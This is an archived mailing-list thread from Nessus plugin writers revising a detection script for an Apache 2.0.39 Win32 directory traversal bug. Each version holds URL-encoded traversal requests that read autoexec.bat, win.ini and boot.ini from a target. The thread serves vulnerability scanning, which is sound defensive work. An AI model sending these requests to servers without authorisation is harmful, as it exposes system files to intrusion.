
Apache Win32 directory traversal
Quick & dirty test for a nasty bug...
I was lucky to find a mirror that was not up to date, so I could
download Apache 2.0.39 and test this.






# This script was quickly written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecuriTeam.
#
# GPL

if (description)
{
  # Registration branch: Nessus evaluates it to learn about the plugin and
  # leaves via exit(0) before any network activity takes place.
  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");

  script_name(english:"Apache 2.0.39 Win32 directory traversal");
  script_summary(english:"Apache 2.0.39 Win32 directory traversal");
  script_description(english:"
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High");

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:"CGI abuses");

  # Runs after the service finder; no404.nasl is declared but this version
  # of the check does not read anything it records.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

# Check starts here

function check(req)
{
  # Fetch 'req' over the global 'port' and report a hole when the reply
  # body contains text typical of a Windows startup or configuration file
  # rather than an ordinary web page. Returns 1 after calling
  # security_hole(), 0 otherwise (including when no socket can be opened).
  soc = open_sock_tcp(port);
  if (! soc) return(0);

  send(socket:soc, data:http_get(item:req, port:port));
  buf = recv(socket:soc, length:4096);
  close(soc);

  # Plain substring matches, no status check: short words such as "mode"
  # or "export" can occur in legitimate pages, so a hit is a strong hint
  # rather than proof.
  # NOTE(review): none of these markers is a win.ini section header, so the
  # win.ini request can only match on the generic words above.
  if (("ECHO" >< buf) ||
      ("SET " >< buf) ||
      ("export" >< buf) ||
      ("EXPORT" >< buf) ||
      ("mode" >< buf) ||
      ("MODE" >< buf) ||
      ("doskey" >< buf) ||
      ("DOSKEY" >< buf) ||
      ("[boot loader]" >< buf))
  {
    security_hole(port:port);
    return(1);
  }
  return(0);
}

port = get_kb_item("Services/www");
if (! port) port = 80;
# Nothing to test when the web port is not open.
if (! get_port_state(port)) exit(0);

# URL-encoded "\..\..\..\..\" prefixes under /error/, each ending in a file
# commonly present on a Windows host. The empty string terminates the list.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "";

# One request per entry; stop as soon as a single one is reported.
for (i = 0; cginameandpath[i]; i = i + 1)
{
  if (check(req:cginameandpath[i])) exit(0);
}
Re: Apache Win32 directory traversal
Oops, sorry, this script was not reliable on WinNT
Here is a new version.
BTW, I suspect that badblue_directory_traversal.nasl may give false
negatives too.

IMHO, it should look for win.ini too; and the check function should look
for more keywords:
("[fonts]" >< buf) ||
("[extensions]" >< buf) ||
("[mci extensions]" >< buf) ||
("[files]" >< buf) ||
("[Mail]" >< buf) ||

Isn't an HTTP 200 code enough to give a warning?





# This script was quickly written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if (description)
{
  # Registration branch: Nessus evaluates it to learn about the plugin and
  # leaves via exit(0) before any network activity takes place.
  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");

  script_name(english:"Apache 2.0.39 Win32 directory traversal");
  script_summary(english:"Apache 2.0.39 Win32 directory traversal");
  script_description(english:"
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High");

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:"CGI abuses");

  # Runs after the service finder; no404.nasl is declared but this version
  # of the check does not read anything it records.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

# Check starts here

function check(req)
{
  # Fetch 'req' over the global 'port' and report a hole when the status
  # line carries a 200 code. Only the first line is inspected; the body is
  # read and discarded. Returns 1 after calling security_hole(), else 0.
  # NOTE(review): a server that answers 200 for every path will also match
  # here; nothing in the body is verified.
  soc = open_sock_tcp(port);
  if (soc)
  {
    send(socket:soc, data:http_get(item:req, port:port));
    cod = recv_line(socket:soc, length:80);
    buf = recv(socket:soc, length:4096);
    close(soc);

    if (" 200 " >< cod)
    {
      security_hole(port:port);
      return(1);
    }
  }
  return(0);
}

port = get_kb_item("Services/www");
if (! port) port = 80;
# Nothing to test when the web port is not open.
if (! get_port_state(port)) exit(0);

# URL-encoded "\..\..\..\..\" prefixes under /error/, each ending in a file
# commonly present on a Windows host. The empty string terminates the list.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";

# One request per entry; stop as soon as a single one is reported.
for (i = 0; cginameandpath[i]; i = i + 1)
{
  if (check(req:cginameandpath[i])) exit(0);
}
Re: Apache Win32 directory traversal
Le dim 18/08/2002 à 16:22, Noam Rathaus a écrit :
> One problem with this is the fact that 404 fakers (sites that respond to
> everything with 200) will cause a false positive on this test.

Right, I forgot them... Is this better like this?





# This script was quickly written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if (description)
{
  # Registration branch: Nessus evaluates it to learn about the plugin and
  # leaves via exit(0) before any network activity takes place.
  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");

  script_name(english:"Apache 2.0.39 Win32 directory traversal");
  script_summary(english:"Apache 2.0.39 Win32 directory traversal");
  script_description(english:"
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High");

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:"CGI abuses");

  # find_service.nes locates the web port; the no404 result is consulted
  # by the check below to decide how much to trust a 200 status.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

# Check starts here

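function check(req, quickcheck)
{
  # Fetch 'req' over the global 'port' and decide whether the reply proves
  # the traversal.
  #   quickcheck != 0 : a 200 status line alone is taken as proof (the
  #                     caller selects this when the server is not known to
  #                     answer 200 for every path);
  #   quickcheck == 0 : the status is ignored and the body must contain a
  #                     marker typical of autoexec.bat, win.ini or boot.ini.
  # Returns 1 after calling security_hole(), 0 otherwise (including when
  # no socket can be opened).
  soc = open_sock_tcp(port);
  if (! soc) return(0);

  send(socket:soc, data:http_get(item:req, port:port));
  cod = recv_line(socket:soc, length:80);
  buf = recv(socket:soc, length:4096);
  close(soc);

  if (quickcheck)
  {
    if (" 200 " >< cod)
    {
      # Named-argument form, used consistently for every report below.
      security_hole(port:port);
      return(1);
    }
    return(0);
  }

  # Plain substring matches; short words such as "mode" or "export" can
  # occur in ordinary pages, which is why this path is only used when the
  # status line cannot be trusted.
  if (("ECHO" >< buf) ||
      ("SET " >< buf) ||
      ("export" >< buf) ||
      ("EXPORT" >< buf) ||
      ("mode" >< buf) ||
      ("MODE" >< buf) ||
      ("doskey" >< buf) ||
      ("DOSKEY" >< buf) ||
      ("[boot loader]" >< buf) ||
      ("[fonts]" >< buf) ||
      ("[extensions]" >< buf) ||
      ("[mci extensions]" >< buf) ||
      ("[files]" >< buf) ||
      ("[Mail]" >< buf))
  {
    security_hole(port:port);
    return(1);
  }
  return(0);
}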

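port = get_kb_item("Services/www");
if (! port) port = 80;
# Nothing to test when the web port is not open.
if (! get_port_state(port)) exit(0);

# URL-encoded "\..\..\..\..\" prefixes under /error/, each ending in a file
# commonly present on a Windows host. The empty string terminates the list.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";

# Trust a bare 200 status unless the knowledge base says this server
# answers every path (key presumably written by no404.nasl, a declared
# dependency); in that case the response body has to be inspected.
qc = 1;
n = string("www/no404/", port);   # statement terminator was missing here
r = get_kb_item(n);
if (r) qc = 0;

# One request per entry; stop as soon as a single one is reported.
for (i = 0; cginameandpath[i]; i = i + 1)
{
  if (check(req:cginameandpath[i], quickcheck:qc)) exit(0);
}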
Re: Apache Win32 directory traversal
Hi,

One problem with this is the fact that 404 fakers (sites that respond to
everything with 200) will cause a false positive on this test.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "Michel Arboi" <arboi@noos.fr>
To: "Nessus plugins writers" <plugins-writers@list.nessus.org>
Sent: Sunday, August 18, 2002 3:19 PM
Subject: Re: Apache Win32 directory traversal


> Oops, sorry, this script was not reliable on WinNT
> Here is a new version.
> BTW, I suspect that badblue_directory_traversal.nasl may give false
> negative too.
>
> IMHO, it should look for win.ini too; and the check function should look
> for more keywords:
> ("[fonts]" >< buf) ||
> ("[extensions]" >< buf) ||
> ("[mci extensions]" >< buf) ||
> ("[files]" >< buf) ||
> ("[Mail]" >< buf) ||
>
> Isn't a HTTP 200 code enough to give a warning?
>
>


--------------------------------------------------------------------------------


# This script was quickly written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if (description)
{
  # Registration branch: Nessus evaluates it to learn about the plugin and
  # leaves via exit(0) before any network activity takes place.
  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");

  script_name(english:"Apache 2.0.39 Win32 directory traversal");
  script_summary(english:"Apache 2.0.39 Win32 directory traversal");
  script_description(english:"
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High");

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:"CGI abuses");

  # Runs after the service finder; no404.nasl is declared but this version
  # of the check does not read anything it records.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

# Check starts here

function check(req)
{
  # Fetch 'req' over the global 'port' and report a hole when the status
  # line carries a 200 code. Only the first line is inspected; the body is
  # read and discarded. Returns 1 after calling security_hole(), else 0.
  # NOTE(review): a server that answers 200 for every path will also match
  # here; nothing in the body is verified.
  soc = open_sock_tcp(port);
  if (soc)
  {
    send(socket:soc, data:http_get(item:req, port:port));
    cod = recv_line(socket:soc, length:80);
    buf = recv(socket:soc, length:4096);
    close(soc);

    if (" 200 " >< cod)
    {
      security_hole(port:port);
      return(1);
    }
  }
  return(0);
}

port = get_kb_item("Services/www");
if (! port) port = 80;
# Nothing to test when the web port is not open.
if (! get_port_state(port)) exit(0);

# URL-encoded "\..\..\..\..\" prefixes under /error/, each ending in a file
# commonly present on a Windows host. The empty string terminates the list.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";

# One request per entry; stop as soon as a single one is reported.
for (i = 0; cginameandpath[i]; i = i + 1)
{
  if (check(req:cginameandpath[i])) exit(0);
}
Re: Apache Win32 directory traversal
Michel Arboi <arboi@noos.fr> writes:

> n = string("www/no404/", port)

Add a ';' at the end of the line -- or use the up to date CVS version.
Re: Apache Win32 directory traversal
Hi,

Besides that ';' that someone else noted, it looks ok :)

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "Michel Arboi" <arboi@noos.fr>
To: "Nessus plugins writers" <plugins-writers@list.nessus.org>
Sent: Sunday, August 18, 2002 3:56 PM
Subject: Re: Apache Win32 directory traversal


Le dim 18/08/2002 à 16:22, Noam Rathaus a écrit :
> One problem with this is the fact that 404 fakers (sites that respond to
> everything with 200) will cause a false positive on this test.

Right, I forgot them... Is this better like this?




--------------------------------------------------------------------------------


# This script was quickly written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecurITeam.
#
# GPL
#
# Reference
# From:"Auriemma Luigi" <aluigi@pivx.com>
# To:bugtraq@securityfocus.com
# Subject: Apache 2.0.39 directory traversal and path disclosure bug
# Date: Fri, 16 Aug 2002 17:01:29 +0000

if (description)
{
  # Registration branch: Nessus evaluates it to learn about the plugin and
  # leaves via exit(0) before any network activity takes place.
  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");

  script_name(english:"Apache 2.0.39 Win32 directory traversal");
  script_summary(english:"Apache 2.0.39 Win32 directory traversal");
  script_description(english:"
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
A cracker may use this to read sensitive files or even executable
any command on your system.

Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High");

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:"CGI abuses");

  # find_service.nes locates the web port; the no404 result is consulted
  # by the check below to decide how much to trust a 200 status.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

# Check starts here

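function check(req, quickcheck)
{
  # Fetch 'req' over the global 'port' and decide whether the reply proves
  # the traversal.
  #   quickcheck != 0 : a 200 status line alone is taken as proof (the
  #                     caller selects this when the server is not known to
  #                     answer 200 for every path);
  #   quickcheck == 0 : the status is ignored and the body must contain a
  #                     marker typical of autoexec.bat, win.ini or boot.ini.
  # Returns 1 after calling security_hole(), 0 otherwise (including when
  # no socket can be opened).
  soc = open_sock_tcp(port);
  if (! soc) return(0);

  send(socket:soc, data:http_get(item:req, port:port));
  cod = recv_line(socket:soc, length:80);
  buf = recv(socket:soc, length:4096);
  close(soc);

  if (quickcheck)
  {
    if (" 200 " >< cod)
    {
      # Named-argument form, used consistently for every report below.
      security_hole(port:port);
      return(1);
    }
    return(0);
  }

  # Plain substring matches; short words such as "mode" or "export" can
  # occur in ordinary pages, which is why this path is only used when the
  # status line cannot be trusted.
  if (("ECHO" >< buf) ||
      ("SET " >< buf) ||
      ("export" >< buf) ||
      ("EXPORT" >< buf) ||
      ("mode" >< buf) ||
      ("MODE" >< buf) ||
      ("doskey" >< buf) ||
      ("DOSKEY" >< buf) ||
      ("[boot loader]" >< buf) ||
      ("[fonts]" >< buf) ||
      ("[extensions]" >< buf) ||
      ("[mci extensions]" >< buf) ||
      ("[files]" >< buf) ||
      ("[Mail]" >< buf))
  {
    security_hole(port:port);
    return(1);
  }
  return(0);
}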

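port = get_kb_item("Services/www");
if (! port) port = 80;
# Nothing to test when the web port is not open.
if (! get_port_state(port)) exit(0);

# URL-encoded "\..\..\..\..\" prefixes under /error/, each ending in a file
# commonly present on a Windows host. The empty string terminates the list.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cboot";
cginameandpath[3] = "";

# Trust a bare 200 status unless the knowledge base says this server
# answers every path (key presumably written by no404.nasl, a declared
# dependency); in that case the response body has to be inspected.
qc = 1;
n = string("www/no404/", port);   # statement terminator was missing here
r = get_kb_item(n);
if (r) qc = 0;

# One request per entry; stop as soon as a single one is reported.
for (i = 0; cginameandpath[i]; i = i + 1)
{
  if (check(req:cginameandpath[i], quickcheck:qc)) exit(0);
}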
Re: Apache Win32 directory traversal
"Noam Rathaus" <noamr@beyondsecurity.com> writes:

> Beside that ';', that someone else noted. It looks ok :)

I added a banner check (in the last CVS version) in case somebody
implements the work around or Nessus cannot read autoexec.bat or
win.ini for whatever reason.
I could have added
script_require_keys("www/apache");
but according to the guy who wrote the advisory, other servers are
vulnerable to the same attack. "More details to come"...

I don't know if it is _exactly_ the same and if the plugin will work
without modification.